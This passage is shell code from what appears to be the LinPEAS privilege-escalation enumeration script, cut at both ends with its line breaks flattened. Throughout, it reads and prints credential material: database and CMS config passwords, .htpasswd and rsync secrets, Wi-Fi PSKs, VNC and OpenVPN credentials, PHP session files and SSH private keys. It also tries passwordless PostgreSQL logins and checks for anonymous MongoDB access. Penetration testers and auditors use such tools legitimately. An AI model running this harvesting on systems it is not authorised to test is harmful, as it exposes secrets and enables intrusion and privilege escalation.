read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,pgadmin.*\.db$,${SED_RED},";
done; echo ""; if ! [ "`echo \"$PSTORAGE_POSTGRESQL\" | grep -E
\"pg_hba\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "pg_hba.conf";
fi; fi; printf "%s" "$PSTORAGE_POSTGRESQL" | grep -E "pg_hba\.conf$" | while
read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,pg_hba\.conf$,${SED_RED},";
cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "\W+\#|^#" | sed -${E}
"s,auth|password|md5|user=|pass=|trust,${SED_RED},g"; done; echo ""; if ! [
"`echo \"$PSTORAGE_POSTGRESQL\" | grep -E \"postgresql\.conf$\"`" ]; then if [
"$DEBUG" ]; then echo_not_found "postgresql.conf"; fi; fi; printf "%s"
"$PSTORAGE_POSTGRESQL" | grep -E "postgresql\.conf$" | while read f; do ls -ld
"$f" 2>/dev/null | sed -${E} "s,postgresql\.conf$,${SED_RED},"; cat "$f"
2>/dev/null | grep -IEv "^$" | grep -Ev "\W+\#|^#" | sed -${E}
"s,auth|password|md5|user=|pass=|trust,${SED_RED},g"; done; echo ""; if ! [
"`echo \"$PSTORAGE_POSTGRESQL\" | grep -E \"pgsql\.conf$\"`" ]; then if [
"$DEBUG" ]; then echo_not_found "pgsql.conf"; fi; fi; printf "%s"
"$PSTORAGE_POSTGRESQL" | grep -E "pgsql\.conf$" | while read f; do ls -ld "$f"
2>/dev/null | sed -${E} "s,pgsql\.conf$,${SED_RED},"; cat "$f" 2>/dev/null |
grep -IEv "^$" | grep -Ev "\W+\#|^#" | sed -${E}
"s,auth|password|md5|user=|pass=|trust,${SED_RED},g"; done; echo ""; if ! [
"`echo \"$PSTORAGE_POSTGRESQL\" | grep -E \"pgadmin4\.db$\"`" ]; then if [
"$DEBUG" ]; then echo_not_found "pgadmin4.db"; fi; fi; printf "%s"
"$PSTORAGE_POSTGRESQL" | grep -E "pgadmin4\.db$" | while read f; do ls -ld "$f"
2>/dev/null | sed -${E} "s,pgadmin4\.db$,${SED_RED},"; done; echo ""; fi #-- SI)
PostgreSQL brute if [ "$TIMEOUT" ] && [ "$(command -v psql)" ] || [ "$DEBUG" ];
then # In some OS (like OpenBSD) it will expect the password from console and
will pause the script. Also, this OS doesn't have the "timeout" command so lets
only use this checks in OS that has it. # Checks to see if any postgres password
exists and connects to DB 'template0' - following commands are a variant on this
print_list "PostgreSQL connection to template0 using postgres/NOPASS ........ "
if [ "$(timeout 1 psql -U postgres -d template0 -c 'select version()'
2>/dev/null)" ]; then echo "Yes" | sed -${E} "s,.*,${SED_RED}," else echo_no fi
print_list "PostgreSQL connection to template1 using postgres/NOPASS ........ "
if [ "$(timeout 1 psql -U postgres -d template1 -c 'select version()'
2>/dev/null)" ]; then echo "Yes" | sed "s,.*,${SED_RED}," else echo_no fi
print_list "PostgreSQL connection to template0 using pgsql/NOPASS ........... "
if [ "$(timeout 1 psql -U pgsql -d template0 -c 'select version()' 2>/dev/null)"
]; then echo "Yes" | sed -${E} "s,.*,${SED_RED}," else echo_no fi print_list
"PostgreSQL connection to template1 using pgsql/NOPASS ........... " if [
"$(timeout 1 psql -U pgsql -d template1 -c 'select version()' 2> /dev/null)" ];
then echo "Yes" | sed -${E} "s,.*,${SED_RED}," else echo_no fi echo "" fi if [
"$PSTORAGE_MONGO" ] || [ "$DEBUG" ]; then print_2title "Analyzing Mongo Files
(limit 70)" echo "Version: $(warn_exec mongo --version 2>/dev/null; warn_exec
mongod --version 2>/dev/null)" if [ "$(command -v mongo)" ]; then echo "show
dbs" | mongo 127.0.0.1 > /dev/null 2>&1;[ "$?" == "0" ] && echo "Possible mongo
anonymous authentication" | sed -${E} "s,.*|kube,${SED_RED},"; fi if ! [ "`echo
\"$PSTORAGE_MONGO\" | grep -E \"mongod.*\.conf$\"`" ]; then if [ "$DEBUG" ];
then echo_not_found "mongod*.conf"; fi; fi; printf "%s" "$PSTORAGE_MONGO" | grep
-E "mongod.*\.conf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E}
"s,mongod.*\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep
-Ev "\W+\#|^#"; done; echo ""; fi if [ "$PSTORAGE_APACHE_NGINX" ] || [ "$DEBUG"
]; then print_2title "Analyzing Apache-Nginx Files (limit 70)" echo "Apache
version: $(warn_exec apache2 -v 2>/dev/null; warn_exec httpd -v 2>/dev/null)"
echo "Nginx version: $(warn_exec nginx -v 2>/dev/null)" if [ -d "/etc/apache2" ]
&& [ -r "/etc/apache2" ]; then grep -R -B1 "httpd-php" /etc/apache2 2>/dev/null;
fi if [ -d "/usr/share/nginx/modules" ] && [ -r "/usr/share/nginx/modules" ];
then print_3title 'Nginx modules'; ls /usr/share/nginx/modules | sed -${E}
"s,$NGINX_KNOWN_MODULES,${SED_GREEN},g"; fi print_3title 'PHP exec extensions'
if ! [ "`echo \"$PSTORAGE_APACHE_NGINX\" | grep -E \"sites-enabled$\"`" ]; then
if [ "$DEBUG" ]; then echo_not_found "sites-enabled"; fi; fi; printf "%s"
"$PSTORAGE_APACHE_NGINX" | grep -E "sites-enabled$" | while read f; do ls -ld
"$f" 2>/dev/null | sed -${E} "s,sites-enabled$,${SED_RED},"; find "$f" -name "*"
| while read ff; do ls -ld "$ff" | sed -${E} "s,.*,${SED_RED},"; cat "$ff"
2>/dev/null | grep -IEv "^$" | grep -Ev "#" | sed -${E}
"s,AuthType|AuthName|AuthUserFile|ServerName|ServerAlias|command
on,${SED_RED},g"; done; echo "";done; echo ""; if ! [ "`echo
\"$PSTORAGE_APACHE_NGINX\" | grep -E \"000-default\.conf$\"`" ]; then if [
"$DEBUG" ]; then echo_not_found "000-default.conf"; fi; fi; printf "%s"
"$PSTORAGE_APACHE_NGINX" | grep -E "000-default\.conf$" | while read f; do ls
-ld "$f" 2>/dev/null | sed -${E} "s,000-default\.conf$,${SED_RED},"; cat "$f"
2>/dev/null | grep -IEv "^$" | grep -Ev "#" | sed -${E}
"s,AuthType|AuthName|AuthUserFile|ServerName|ServerAlias,${SED_RED},g"; done;
echo ""; if ! [ "`echo \"$PSTORAGE_APACHE_NGINX\" | grep -E \"php\.ini$\"`" ];
then if [ "$DEBUG" ]; then echo_not_found "php.ini"; fi; fi; printf "%s"
"$PSTORAGE_APACHE_NGINX" | grep -E "php\.ini$" | while read f; do ls -ld "$f"
2>/dev/null | sed -${E} "s,php\.ini$,${SED_RED},"; cat "$f" 2>/dev/null | grep
-IEv "^$" | grep -E allow_ | grep -Ev "^;" | sed -${E} "s,On,${SED_RED},g";
done; echo ""; if ! [ "`echo \"$PSTORAGE_APACHE_NGINX\" | grep -E
\"nginx\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "nginx.conf";
fi; fi; printf "%s" "$PSTORAGE_APACHE_NGINX" | grep -E "nginx\.conf$" | while
read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,nginx\.conf$,${SED_RED},"; cat
"$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "#" | sed -${E}
"s,location.*.php$|$uri|$document_uri|proxy_intercept_errors.*on|proxy_hide_header.*|merge_slashes.*on|resolver.*|proxy_pass|internal|location.+[a-zA-Z0-9][^/]\s+\{|map|proxy_set_header.*Upgrade.*http_upgrade|proxy_set_header.*Connection.*http_connection,${SED_RED},g";
done; echo ""; if ! [ "`echo \"$PSTORAGE_APACHE_NGINX\" | grep -E \"nginx$\"`"
]; then if [ "$DEBUG" ]; then echo_not_found "nginx"; fi; fi; printf "%s"
"$PSTORAGE_APACHE_NGINX" | grep -E "nginx$" | while read f; do ls -ld "$f"
2>/dev/null | sed -${E} "s,nginx$,${SED_RED},"; find "$f" -name "*.conf" | while
read ff; do ls -ld "$ff" | sed -${E} "s,.conf,${SED_RED},"; cat "$ff"
2>/dev/null | grep -IEv "^$" | grep -Ev "#" | sed -${E}
"s,location.*.php$|$uri|$document_uri|proxy_intercept_errors.*on|proxy_hide_header.*|merge_slashes.*on|resolver.*|proxy_pass|internal|location.+[a-zA-Z0-9][^/]\s+\{|map|proxy_set_header.*Upgrade.*http_upgrade|proxy_set_header.*Connection.*http_connection,${SED_RED},g";
done; echo "";done; echo ""; fi if [ "$PSTORAGE_TOMCAT" ] || [ "$DEBUG" ]; then
print_2title "Analyzing Tomcat Files (limit 70)" if ! [ "`echo
\"$PSTORAGE_TOMCAT\" | grep -E \"tomcat-users\.xml$\"`" ]; then if [ "$DEBUG" ];
then echo_not_found "tomcat-users.xml"; fi; fi; printf "%s" "$PSTORAGE_TOMCAT" |
grep -E "tomcat-users\.xml$" | while read f; do ls -ld "$f" 2>/dev/null | sed
-${E} "s,tomcat-users\.xml$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"
| grep -E "username=|password=" | sed -${E}
"s,dbtype|dbhost|dbuser|dbhost|dbpass|dbport,${SED_RED},g"; done; echo ""; fi if
[ "$PSTORAGE_FASTCGI" ] || [ "$DEBUG" ]; then print_2title "Analyzing FastCGI
Files (limit 70)" if ! [ "`echo \"$PSTORAGE_FASTCGI\" | grep -E
\"fastcgi_params$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found
"fastcgi_params"; fi; fi; printf "%s" "$PSTORAGE_FASTCGI" | grep -E
"fastcgi_params$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E}
"s,fastcgi_params$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E
"DB_NAME|DB_USER|DB_PASS" | sed -${E} "s,DB_NAME|DB_USER|DB_PASS,${SED_RED},g";
done; echo ""; fi if [ "$PSTORAGE_HTTP_CONF" ] || [ "$DEBUG" ]; then
print_2title "Analyzing Http conf Files (limit 70)" if ! [ "`echo
\"$PSTORAGE_HTTP_CONF\" | grep -E \"httpd\.conf$\"`" ]; then if [ "$DEBUG" ];
then echo_not_found "httpd.conf"; fi; fi; printf "%s" "$PSTORAGE_HTTP_CONF" |
grep -E "httpd\.conf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E}
"s,httpd\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E
"htaccess.*|htpasswd.*" | grep -Ev "\W+\#|^#" | sed -${E}
"s,htaccess.*|htpasswd.*,${SED_RED},g"; done; echo ""; fi if [
"$PSTORAGE_HTPASSWD" ] || [ "$DEBUG" ]; then print_2title "Analyzing Htpasswd
Files (limit 70)" if ! [ "`echo \"$PSTORAGE_HTPASSWD\" | grep -E
\"\.htpasswd$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".htpasswd"; fi;
fi; printf "%s" "$PSTORAGE_HTPASSWD" | grep -E "\.htpasswd$" | while read f; do
ls -ld "$f" 2>/dev/null | sed -${E} "s,\.htpasswd$,${SED_RED},"; cat "$f"
2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,.*,${SED_RED},g";
done; echo ""; fi if [ "$PSTORAGE_PHP_SESSIONS" ] || [ "$DEBUG" ]; then
print_2title "Analyzing PHP Sessions Files (limit 70)" ls /var/lib/php/sessions
2>/dev/null || echo_not_found /var/lib/php/sessions if ! [ "`echo
\"$PSTORAGE_PHP_SESSIONS\" | grep -E \"sess_.*$\"`" ]; then if [ "$DEBUG" ];
then echo_not_found "sess_*"; fi; fi; printf "%s" "$PSTORAGE_PHP_SESSIONS" |
grep -E "sess_.*$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E}
"s,sess_.*$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo "";
fi if [ "$PSTORAGE_WORDPRESS" ] || [ "$DEBUG" ]; then print_2title "Analyzing
Wordpress Files (limit 70)" if ! [ "`echo \"$PSTORAGE_WORDPRESS\" | grep -E
\"wp-config\.php$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found
"wp-config.php"; fi; fi; printf "%s" "$PSTORAGE_WORDPRESS" | grep -E
"wp-config\.php$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E}
"s,wp-config\.php$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E
"PASSWORD|USER|NAME|HOST" | sed -${E} "s,PASSWORD|USER|NAME|HOST,${SED_RED},g";
done; echo ""; fi if [ "$PSTORAGE_DRUPAL" ] || [ "$DEBUG" ]; then print_2title
"Analyzing Drupal Files (limit 70)" if ! [ "`echo \"$PSTORAGE_DRUPAL\" | grep -E
\"settings\.php$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found
"settings.php"; fi; fi; printf "%s" "$PSTORAGE_DRUPAL" | grep -E
"settings\.php$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E}
"s,settings\.php$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E
"drupal_hash_salt|'database'|'username'|'password'|'host'|'port'|'driver'|'prefix'"
| sed -${E}
"s,drupal_hash_salt|'database'|'username'|'password'|'host'|'port'|'driver'|'prefix',${SED_RED},g";
done; echo ""; fi if [ "$PSTORAGE_MOODLE" ] || [ "$DEBUG" ]; then print_2title
"Analyzing Moodle Files (limit 70)" if ! [ "`echo \"$PSTORAGE_MOODLE\" | grep -E
\"config\.php$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "config.php";
fi; fi; printf "%s" "$PSTORAGE_MOODLE" | grep -E "config\.php$" | while read f;
do ls -ld "$f" 2>/dev/null | sed -${E} "s,config\.php$,${SED_RED},"; cat "$f"
2>/dev/null | grep -IEv "^$" | grep -E
"dbtype|dbhost|dbuser|dbhost|dbpass|dbport" | sed -${E}
"s,dbtype|dbhost|dbuser|dbhost|dbpass|dbport,${SED_RED},g"; done; echo ""; fi if
[ "$PSTORAGE_SUPERVISORD" ] || [ "$DEBUG" ]; then print_2title "Analyzing
Supervisord Files (limit 70)" if ! [ "`echo \"$PSTORAGE_SUPERVISORD\" | grep -E
\"supervisord\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found
"supervisord.conf"; fi; fi; printf "%s" "$PSTORAGE_SUPERVISORD" | grep -E
"supervisord\.conf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E}
"s,supervisord\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep
-E "port.*=|username.*=|password.*=" | sed -${E}
"s,port.*=|username.*=|password.*=,${SED_RED},g"; done; echo ""; fi if [
"$PSTORAGE_CESI" ] || [ "$DEBUG" ]; then print_2title "Analyzing Cesi Files
(limit 70)" if ! [ "`echo \"$PSTORAGE_CESI\" | grep -E \"cesi\.conf$\"`" ]; then
if [ "$DEBUG" ]; then echo_not_found "cesi.conf"; fi; fi; printf "%s"
"$PSTORAGE_CESI" | grep -E "cesi\.conf$" | while read f; do ls -ld "$f"
2>/dev/null | sed -${E} "s,cesi\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep
-IEv "^$" | grep -E "username.*=|password.*=|host.*=|port.*=|database.*=" | sed
-${E} "s,username.*=|password.*=|host.*=|port.*=|database.*=,${SED_RED},g";
done; echo ""; fi if [ "$PSTORAGE_RSYNC" ] || [ "$DEBUG" ]; then print_2title
"Analyzing Rsync Files (limit 70)" if ! [ "`echo \"$PSTORAGE_RSYNC\" | grep -E
\"rsyncd\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "rsyncd.conf";
fi; fi; printf "%s" "$PSTORAGE_RSYNC" | grep -E "rsyncd\.conf$" | while read f;
do ls -ld "$f" 2>/dev/null | sed -${E} "s,rsyncd\.conf$,${SED_RED},"; cat "$f"
2>/dev/null | grep -IEv "^$" | grep -Ev "\W+\#|^#" | sed -${E}
"s,secrets.*|auth.*users.*=,${SED_RED},g"; done; echo ""; if ! [ "`echo
\"$PSTORAGE_RSYNC\" | grep -E \"rsyncd\.secrets$\"`" ]; then if [ "$DEBUG" ];
then echo_not_found "rsyncd.secrets"; fi; fi; printf "%s" "$PSTORAGE_RSYNC" |
grep -E "rsyncd\.secrets$" | while read f; do ls -ld "$f" 2>/dev/null | sed
-${E} "s,rsyncd\.secrets$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" |
sed -${E} "s,.*,${SED_RED},g"; done; echo ""; fi if [ "$PSTORAGE_HOSTAPD" ] || [
"$DEBUG" ]; then print_2title "Analyzing Hostapd Files (limit 70)" if ! [ "`echo
\"$PSTORAGE_HOSTAPD\" | grep -E \"hostapd\.conf$\"`" ]; then if [ "$DEBUG" ];
then echo_not_found "hostapd.conf"; fi; fi; printf "%s" "$PSTORAGE_HOSTAPD" |
grep -E "hostapd\.conf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E}
"s,hostapd\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev
"^#" | sed -${E} "s,passphrase.*,${SED_RED},g"; done; echo ""; fi if [
"$PSTORAGE_WIFI_CONNECTIONS" ] || [ "$DEBUG" ]; then print_2title "Analyzing
Wifi Connections Files (limit 70)" if ! [ "`echo \"$PSTORAGE_WIFI_CONNECTIONS\"
| grep -E \"system-connections$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found
"system-connections"; fi; fi; printf "%s" "$PSTORAGE_WIFI_CONNECTIONS" | grep -E
"system-connections$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E}
"s,system-connections$,${SED_RED},"; find "$f" -name "*" | while read ff; do ls
-ld "$ff" | sed -${E} "s,.*,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$"
| grep -E "psk.*" | sed -${E} "s,psk.*,${SED_RED},g"; done; echo "";done; echo
""; fi if [ "$PSTORAGE_ANACONDA_KS" ] || [ "$DEBUG" ]; then print_2title
"Analyzing Anaconda ks Files (limit 70)" if ! [ "`echo \"$PSTORAGE_ANACONDA_KS\"
| grep -E \"anaconda-ks\.cfg$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found
"anaconda-ks.cfg"; fi; fi; printf "%s" "$PSTORAGE_ANACONDA_KS" | grep -E
"anaconda-ks\.cfg$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E}
"s,anaconda-ks\.cfg$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep
-E "rootpw.*" | sed -${E} "s,rootpw.*,${SED_RED},g"; done; echo ""; fi if [
"$PSTORAGE_VNC" ] || [ "$DEBUG" ]; then print_2title "Analyzing VNC Files (limit
70)" if ! [ "`echo \"$PSTORAGE_VNC\" | grep -E \"\.vnc$\"`" ]; then if [
"$DEBUG" ]; then echo_not_found ".vnc"; fi; fi; printf "%s" "$PSTORAGE_VNC" |
grep -E "\.vnc$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E}
"s,\.vnc$,${SED_RED},"; find "$f" -name "passwd" | while read ff; do ls -ld
"$ff" | sed -${E} "s,passwd,${SED_RED},"; done; echo "";done; echo ""; if ! [
"`echo \"$PSTORAGE_VNC\" | grep -E \"vnc.*\.c.*nf.*$\"`" ]; then if [ "$DEBUG"
]; then echo_not_found "*vnc*.c*nf*"; fi; fi; printf "%s" "$PSTORAGE_VNC" | grep
-E "vnc.*\.c.*nf.*$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E}
"s,vnc.*\.c.*nf.*$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep
-Ev "^#" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; if ! [ "`echo
\"$PSTORAGE_VNC\" | grep -E \"vnc.*\.ini$\"`" ]; then if [ "$DEBUG" ]; then
echo_not_found "*vnc*.ini"; fi; fi; printf "%s" "$PSTORAGE_VNC" | grep -E
"vnc.*\.ini$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E}
"s,vnc.*\.ini$,${SED_RED},"; done; echo ""; if ! [ "`echo \"$PSTORAGE_VNC\" |
grep -E \"vnc.*\.txt$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found
"*vnc*.txt"; fi; fi; printf "%s" "$PSTORAGE_VNC" | grep -E "vnc.*\.txt$" | while
read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,vnc.*\.txt$,${SED_RED},"; cat
"$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo
""; if ! [ "`echo \"$PSTORAGE_VNC\" | grep -E \"vnc.*\.xml$\"`" ]; then if [
"$DEBUG" ]; then echo_not_found "*vnc*.xml"; fi; fi; printf "%s" "$PSTORAGE_VNC"
| grep -E "vnc.*\.xml$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E}
"s,vnc.*\.xml$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E}
"s,.*,${SED_RED},g"; done; echo ""; fi if [ "$PSTORAGE_OPENVPN" ] || [ "$DEBUG"
]; then print_2title "Analyzing OpenVPN Files (limit 70)" if ! [ "`echo
\"$PSTORAGE_OPENVPN\" | grep -E \"\.ovpn$\"`" ]; then if [ "$DEBUG" ]; then
echo_not_found "*.ovpn"; fi; fi; printf "%s" "$PSTORAGE_OPENVPN" | grep -E
"\.ovpn$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E}
"s,\.ovpn$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E
"auth-user-pass.+" | sed -${E} "s,auth-user-pass.+,${SED_RED},g"; done; echo "";
fi if [ "$PSTORAGE_LDAP" ] || [ "$DEBUG" ]; then print_2title "Analyzing Ldap
Files (limit 70)" echo "The password hash is from the {SSHA} to 'structural'" if
! [ "`echo \"$PSTORAGE_LDAP\" | grep -E \"ldap$\"`" ]; then if [ "$DEBUG" ];
then echo_not_found "ldap"; fi; fi; printf "%s" "$PSTORAGE_LDAP" | grep -E
"ldap$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E}
"s,ldap$,${SED_RED},"; find "$f" -name "*.bdb" | while read ff; do ls -ld "$ff"
| sed -${E} "s,.bdb,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep
-E -i -a -o "description.*" | sort | uniq | sed -${E}
"s,administrator|password|ADMINISTRATOR|PASSWORD|Password|Administrator,${SED_RED},g";
done; echo "";done; echo ""; fi if [ "$PSTORAGE_LOG4SHELL" ] || [ "$DEBUG" ];
then print_2title "Searching Log4Shell vulnerable libraries" printf "%s\n"
"$PSTORAGE_LOG4SHELL" | while read f; do echo "$f" | grep -E
"log4j\-core\-(1\.[^0]|2\.[0-9][^0-9]|2\.1[0-6])" | sed -${E}
"s,log4j\-core\-(1\.[^0]|2\.[0-9][^0-9]|2\.1[0-6]),${SED_RED},"; done echo "" fi
#-- SI) ssh files print_2title "Searching ssl/ssh files" if [
"$PSTORAGE_CERTSB4" ]; then certsb4_grep=$(grep -L "\"\|'\|(" $PSTORAGE_CERTSB4
2>/dev/null); fi if ! [ "$SEARCH_IN_FOLDER" ]; then sshconfig="$(ls
/etc/ssh/ssh_config 2>/dev/null)" hostsdenied="$(ls /etc/hosts.denied
2>/dev/null)" hostsallow="$(ls /etc/hosts.allow 2>/dev/null)"
writable_agents=$(find /tmp /etc /home -type s -name "agent.*" -or -name
"*gpg-agent*" '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w
-and '(' $wgroups ')' ')' ')' 2>/dev/null) else sshconfig="$(ls
${ROOT_FOLDER}etc/ssh/ssh_config 2>/dev/null)" hostsdenied="$(ls
${ROOT_FOLDER}etc/hosts.denied 2>/dev/null)" hostsallow="$(ls
${ROOT_FOLDER}etc/hosts.allow 2>/dev/null)" writable_agents=$(find
${ROOT_FOLDER} -type s -name "agent.*" -or -name "*gpg-agent*" '(' '(' -user
$USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')'
')' 2>/dev/null) fi if [ "$PSTORAGE_SSH" ] || [ "$DEBUG" ]; then print_2title
"Analyzing SSH Files (limit 70)" if ! [ "`echo \"$PSTORAGE_SSH\" | grep -E
\"id_dsa.*$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "id_dsa*"; fi; fi;
printf "%s" "$PSTORAGE_SSH" | grep -E "id_dsa.*$" | while read f; do ls -ld "$f"
2>/dev/null | sed -${E} "s,id_dsa.*$,${SED_RED},"; cat "$f" 2>/dev/null | grep
-IEv "^$"; done; echo ""; if ! [ "`echo \"$PSTORAGE_SSH\" | grep -E
\"id_rsa.*$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "id_rsa*"; fi; fi;
printf "%s" "$PSTORAGE_SSH" | grep -E "id_rsa.*$" | while read f; do ls -ld "$f"
2>/dev/null | sed -${E} "s,id_rsa.*$,${SED_RED},"; cat "$f" 2>/dev/null | grep
-IEv "^$"; done; echo ""; if ! [ "`echo \"$PSTORAGE_SSH\" | grep -E
\"known_hosts$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "known_hosts";
fi; fi; printf "%s" "$PSTORAGE_SSH" | grep -E "known_hosts$" | while read f; do
ls -ld "$f" 2>/dev/null | sed -${E} "s,known_hosts$,${SED_RED},"; cat "$f"
2>/dev/null | grep -IEv "^$"; done; echo ""; if ! [ "`echo \"$PSTORAGE_SSH\" |
grep -E \"authorized_hosts$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found
"authorized_hosts"; fi; fi; printf "%s" "$PSTORAGE_SSH" | grep -E
"authorized_hosts$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E}
"s,authorized_hosts$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done;
echo ""; if ! [ "`echo \"$PSTORAGE_SSH\" | grep -E \"authorized_keys$\"`" ];
then if [ "$DEBUG" ]; then echo_not_found "authorized_keys"; fi; fi; printf "%s"
"$PSTORAGE_SSH" | grep -E "authorized_keys$" | while read f; do ls -ld "$f"
2>/dev/null | sed -${E} "s,authorized_keys$,${SED_RED},"; cat "$f" 2>/dev/null |
grep -IEv "^$" | sed -${E} "s,command=.*,${SED_RED},g" | sed -${E}
"s,from=[\w\._\-]+,${SED_GOOD},g"; done; echo ""; if ! [ "`echo
\"$PSTORAGE_SSH\" | grep -E \"\.pub$\"`" ]; then if [ "$DEBUG" ]; then
echo_not_found "*.pub"; fi; fi; printf "%s" "$PSTORAGE_SSH" | grep -E "\.pub$" |
while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.pub$,${SED_RED},"; cat
"$f" 2>/dev/null | grep -IEv "^$" | grep -E "command=.*" | sed -${E}
"s,command=.*,${SED_RED},g"; done; echo ""; fi grep "PermitRootLogin
\|ChallengeResponseAuthentication \|PasswordAuthentication \|UsePAM
\|Port\|PermitEmptyPasswords\|PubkeyAuthentication\|ListenAddress\|ForwardAgent\|AllowAgentForwarding\|AuthorizedKeysFiles"
/etc/ssh/sshd_config 2>/dev/null | grep -v "#" | sed -${E}
"s,PermitRootLogin.*es|PermitEmptyPasswords.*es|ChallengeResponseAuthentication.*es|FordwardAgent.*es,${SED_RED},"
if ! [ "$SEARCH_IN_FOLDER" ]; then if [ "$TIMEOUT" ]; then
privatekeyfilesetc=$(timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE
KEY.*\-\-\-\-\-' /etc 2>/dev/null) privatekeyfileshome=$(timeout 40 grep -rl
'\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' $HOMESEARCH 2>/dev/null)
privatekeyfilesroot=$(timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE
KEY.*\-\-\-\-\-' /root 2>/dev/null) privatekeyfilesmnt=$(timeout 40 grep -rl
'\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /mnt 2>/dev/null) else
privatekeyfilesetc=$(grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /etc
2>/dev/null) # If there is tons of files linpeas gets frozen here without a
timeout privatekeyfileshome=$(grep -rl '\-\-\-\-\-BEGIN .* PRIVATE
KEY.*\-\-\-\-\-' $HOME/.ssh 2>/dev/null) fi else # If $SEARCH_IN_FOLDER lets
just search for private keys in the whole firmware privatekeyfilesetc=$(timeout
120 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' "$ROOT_FOLDER"
2>/dev/null) fi if [ "$privatekeyfilesetc" ] || [ "$privatekeyfileshome" ] || [
"$privatekeyfilesroot" ] || [ "$privatekeyfilesmnt" ] ; then echo ""
print_3title "Possible private SSH keys were found!" | sed -${E} "s,private SSH
keys,${SED_RED}," if [ "$privatekeyfilesetc" ]; then printf
"$privatekeyfilesetc\n" | sed -${E} "s,.*,${SED_RED},"; fi if [
"$privatekeyfileshome" ]; then printf "$privatekeyfileshome\n" | sed -${E}
"s,.*,${SED_RED},"; fi if [ "$privatekeyfilesroot" ]; then printf
"$privatekeyfilesroot\n" | sed -${E} "s,.*,${SED_RED},"; fi if [
"$privatekeyfilesmnt" ]; then printf "$privatekeyfilesmnt\n" | sed -${E}
"s,.*,${SED_RED},"; fi echo "" fi if [ "$certsb4_grep" ] || [
"$PSTORAGE_CERTSBIN" ]; then print_3title "Some certificates were found (out
limited):" printf "$certsb4_grep\n" | head -n 20 printf "$$PSTORAGE_CERTSBIN\n"
| head -n 20 echo "" fi if [ "$PSTORAGE_CERTSCLIENT" ]; then print_3title "Some
client certificates were found:" printf "$PSTORAGE_CERTSCLIENT\n" echo "" fi if
[ "$PSTORAGE_SSH_AGENTS" ]; then print_3title "Some SSH Agent files were found:"
printf "$PSTORAGE_SSH_AGENTS\n" echo "" fi if ssh-add -l 2>/dev/null | grep -qv
'no identities'; then print_3title "Listing SSH Agents" ssh-add -l echo "" fi if
gpg-connect-agent "keyinfo --list" /bye 2>/dev/null | grep "D - - 1"; then
